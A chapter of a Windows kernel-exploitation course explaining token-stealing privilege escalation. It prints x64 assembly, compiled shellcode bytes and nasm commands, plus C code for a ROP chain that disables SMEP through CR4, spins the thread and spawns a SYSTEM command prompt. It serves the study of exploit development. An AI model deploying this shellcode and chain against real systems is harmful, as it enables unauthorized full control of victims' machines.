Priv Esc Shellcode

Privilege escalation refers to gaining higher levels of access or permissions beyond what is originally granted, often to exploit vulnerabilities or perform unauthorised actions.

In this section we will revist security tokens and show how they can be stolen to elevate privileges.

Escalating Privileges

The highest privilege level in the Windows operating system is commonly referred to as "NT Authority/SYSTEM" or simply "SYSTEM." It represents the built-in system account with full control and unrestricted access to system resources.

Using Process Hacker 2 we can see that the SYSTEM process (with PID 4) runs with the highest privileges possible:

While the SYSTEM process has high privileges in the Windows operating system, it is not the same as the kernel. The kernel is the core component of an operating system that manages system resources and provides essential services. It operates at a lower level than user processes and has direct control over hardware and memory.

The SYSTEM process, on the other hand, is a user-mode process that runs with elevated privileges. It represents the highest level of access for a user-mode process but still operates within the confines of the operating system's security boundaries. The kernel and the SYSTEM process work together to ensure the proper functioning and security of the operating system.

If we have code execution in the kernel context we can attempt to steal the token from the SYSTEM process and apply it to our exploit process, escelating our privileges.

Stealing a Token

We looked at how we can apply a privileged token to another process using the Windbg debugger. This isn't a practical way to do this when writing exploits. There is a little bit more involved when doing this with shellcode but thankfully it isn't too painful!

The diagram below shows how we can enumerate the running processes from within the kernel context:

Note: It is important to resolve the correct offsets. The data structure pointers will differ accross different operating system versions. The offsets shown are for Windows 10 version 1607.

The GS register is a special-purpose register in x86 processors that holds a segment selector, typically used by the operating system to access thread-specific data structures efficiently.

It points to the KPCR (Kernel Processor Control Region) data structure in the Windows operating system because it allows efficient access to per-processor data and control information, including thread-specific data structures, exception handling, and other kernel-related information.

In the KPCR (Kernel Processor Control Region) structure, the PrcbData field contains a pointer to the Kernel Processor Control Block (KPRCB) for the current thread. The KPRCB contains processor-specific data and control information related to the execution of the current thread. It also contains a pointer to the current thread (KTHREAD).

The ApcState field in the KTHREAD structure represents the Asynchronous Procedure Call (APC) state of the thread. It contains a pointer to the thread's APC state block, which is used to manage pending APC requests for the thread. APCs are a mechanism for executing code asynchronously in a thread's context. Luckily for us, there is a pointer in the KAPC_STATE that points to the structure representing our process.

Finaly, we can enumerate all processes by traversing the ActiveProcessLinks field inside the EPROCESS structure.

Notice that the EPROCESS structure also contains the PID for the process, and a pointer to the assigned token.

The Plan

The plan is to find the process with PID 4, steal the token memory address, and assign it to our exploit process.

Assembly

This assembly code snippet implements the concept of token stealing discussed earlier. It searches for a system process and replaces the token of the current process with the system token.

BITS 64
SECTION .text
    SYS_PID equ 0x04
    PRCB_DATA equ 0x180
    CURRENT_THREAD equ 0x08
    APC_STATE equ 0x98
    PROCESS equ 0x20
    UNIQUE_PROCESS_ID equ 0x2e8
    ACTIVE_PROCESS_LINKS equ 0x2f0
    TOKEN equ 0x358

global main

main:
find_process:
    xor rax, rax                                  ; RAX = 0
    mov rax, [gs:rax+PRCB_DATA+CURRENT_THREAD]    ; RAX = *CurrentThread
    mov rax, [rax+APC_STATE+PROCESS]              ; RAX = *ApcState.Process
    mov r8, rax                                   ; R8 = *ApcState.Process
    mov r9, SYS_PID                               ; R9 = 0x4

next_system_process:
    mov r8, [r8+ACTIVE_PROCESS_LINKS]             ; R8 = ActiveProcessLinks.Flink (next process offset)
    sub r8, ACTIVE_PROCESS_LINKS                  ; R8 = *EPROCESS (next process)
    cmp [r8+UNIQUE_PROCESS_ID], r9                ; is EPROCESS.UniqueProcessId = R9 (0x4)
    jnz next_system_process                       ; if not then loop

found_system_process:
    mov rcx, [r8+TOKEN]                           ; RCX = *EPROCESS.Token
    and cl, 0xf0                                  ; Clear out _EX_FAST_REF RefCnt
    mov [rax+TOKEN], rcx                          ; *ApcState.Process in RAX (current) token
                                                  ; is replaced with the system one
end:
    ret;

The code begins by defining equates (equ) for various offsets used in the assembly code. These offsets represent different fields within the process structures.
The main function starts with the label "find_process" and initializes the process of finding the system process.
It uses the xor instruction to clear the rax register and then loads the value at [gs:rax+PRCB_DATA+CURRENT_THREAD] into rax. This sequence of instructions retrieves the current thread.
The next instruction loads the value at [rax+APC_STATE+PROCESS] into rax. This value points to the EPROCESS structure for the current process.
The value in eax is copied to r8, which will be used as a pointer to the current process.
The value 0x4 (SYS_PID) is moved into r9. This value represents the unique process ID of the system process.
The code enters a loop labeled "next_system_process" where it updates r8 with the value at [r8+ACTIVE_PROCESS_LINKS], which represents the offset to the next process in the ActiveProcessLinks list.
The code then subtracts the value of ACTIVE_PROCESS_LINKS from r8 to obtain the pointer to the next process.
It compares the value at [r8+UNIQUE_PROCESS_ID] with r9 to check if the UniqueProcessId of the current process matches the system process ID. If they don't match, the code jumps to the "next_system_process" label to continue searching.
Once a match is found, the code proceeds to the "found_system_process" label. It loads the value at [r8+TOKEN] into rcx, representing the system token.
The "and" instruction clears the lower 4 bits of cl, effectively clearing the _EX_FAST_REF RefCnt field.
Finally, the value in rcx is moved back into [rax+TOKEN], which updates the current process token with the system token.
The code ends with the "end" label and a ret instruction, indicating the end of the main function.

We can use this assembly code to compile our shellcode:

copy .\token-theft-x64.asm .\x64.asm
nasm -f bin -o token-theft-x64.bin token-theft-x64.asm
Hex2.exe .\token-theft-x64.bin

We now have shellcode we can use in our exploit.

Shellcode

The shellcode generated by nasm is shown below:

const unsigned char shellcode[] = {
    0x48, 0x31, 0xC0, 0x65, 0x48, 0x8B, 0x80, 0x88, 
    0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xB8, 0x00, 
    0x00, 0x00, 0x49, 0x89, 0xC0, 0x41, 0xB9, 0x04, 
    0x00, 0x00, 0x00, 0x4D, 0x8B, 0x80, 0xF0, 0x02, 
    0x00, 0x00, 0x49, 0x81, 0xE8, 0xF0, 0x02, 0x00, 
    0x00, 0x4D, 0x39, 0x88, 0xE8, 0x02, 0x00, 0x00, 
    0x75, 0xE9, 0x49, 0x8B, 0x88, 0x58, 0x03, 0x00, 
    0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89, 0x88, 0x58, 
    0x03, 0x00, 0x00, 0xC3
};

This should be added to your exploit code (Replace the shellcode placeholder).

Recovery

After a successful exploit in the kernel, it is important to restore the processor state and stack to their original state (or to a state where the kernel can recover). This ensures the system's stability and prevents any unintended side effects or crashes that may occur due to the altered state during the exploit.

Restoring the processor and stack helps maintain the integrity of the system and allows it to continue running smoothly.

If we are unable to restore the kernel it is likely that we will encounter a BSOD, and our exploit is useless!

Sometimes a clean recovery is not possible and we have to look at different options, but all is not lost. Bugcheck and Skape published a paper in 2005 called Kernel-mode Payloads on Windows. The paper contains fur innovative techniques for recovering the kernel following an exploit.

Thread Spinning

In cases where a vulnerability occurs in a non-critical kernel thread, it may be feasible to induce the thread to continuously loop or remain blocked indefinitely. This strategy is advantageous as it eliminates the need to restore execution gracefully, simplifying the mitigation process.

Consider running this assembly in your thread:

spin_thread:
    jmp spin_thread

The thread will simply enter this continuous loop and will not affect any other threads in the kernel space.

We will implement thread spinning using ROP:

uint64_t LEA_RAX_RSP_8 = kernelBase + 0x14aa10;
uint64_t MOV_RAX_QWORD_RAX = kernelBase + 0x8f042;
uint64_t JMP_RAX = kernelBase + 0x6e59ec;

We can now amend our ROP chain to include ROP gadgets that will spin the current thread:

// get a pointer to the offset for the rop chain
uint64_t* rop = (uint64_t*)((uint64_t)buffer + offset);

// the rop chain
*(rop + index++) = POP_RCX;
*(rop + index++) = (uint64_t)0x050678;
*(rop + index++) = MOV_CR4_RCX;

// the return address to our shellcode
*(rop + index++) = (uint64_t)alloc;

// spin the thread
*(rop + index++) = (uint64_t)LEA_RAX_RSP_8;
*(rop + index++) = (uint64_t)MOV_RAX_QWORD_RAX;
*(rop + index++) = (uint64_t)JMP_RAX;

printf("[!] Press enter when ready...");
getchar();

Finally, we will create a new thread that will inherit the stolen token, allow us to gain privilege escalation, and spin the initial thread in the background.

Place the following function somewhere near the top of the exploit code:

DWORD WINAPI ThreadFunc(void* data) {
  Sleep(2000);
  WinExec("cmd.exe", 1);
  return 0;
}

This code sleeps the thread for 2 seconds (whilst the token stealing shellcode is allowed to run) and then spawns a new command prompt.

We can now amend the code to start our new thread:

printf("[!] Press enter when ready...");
getchar();

// create a new thread to escalate privileges on
printf("[+] Creating a privileged thread...\n");
HANDLE thread = CreateThread(NULL, 0, ThreadFunc, NULL, 0, NULL);

Executing the Exploit

Excellent! It's time to run the full exploit on the target and gain escalated privileges:

Congratulations, we have written our first kernel exploit.

This concludes the first section of the course, We will move on to more advanced topics next!

Demo

Work in progress

Exercises

You might want to try out these exercises:

Try to recover the kernel using a different method, maybe try thread spinning in the shellcode, or by throwing an exception.
Write the entire exploit from scratch, this time avoid using shellcode and use a ROP chain only.
Consider re-enabling SMEP once the exploit is complete. This can be done with the same ROP gadgets we discovered earlier.

PreviouskASLR NextExploit Code

Last updated 2 years ago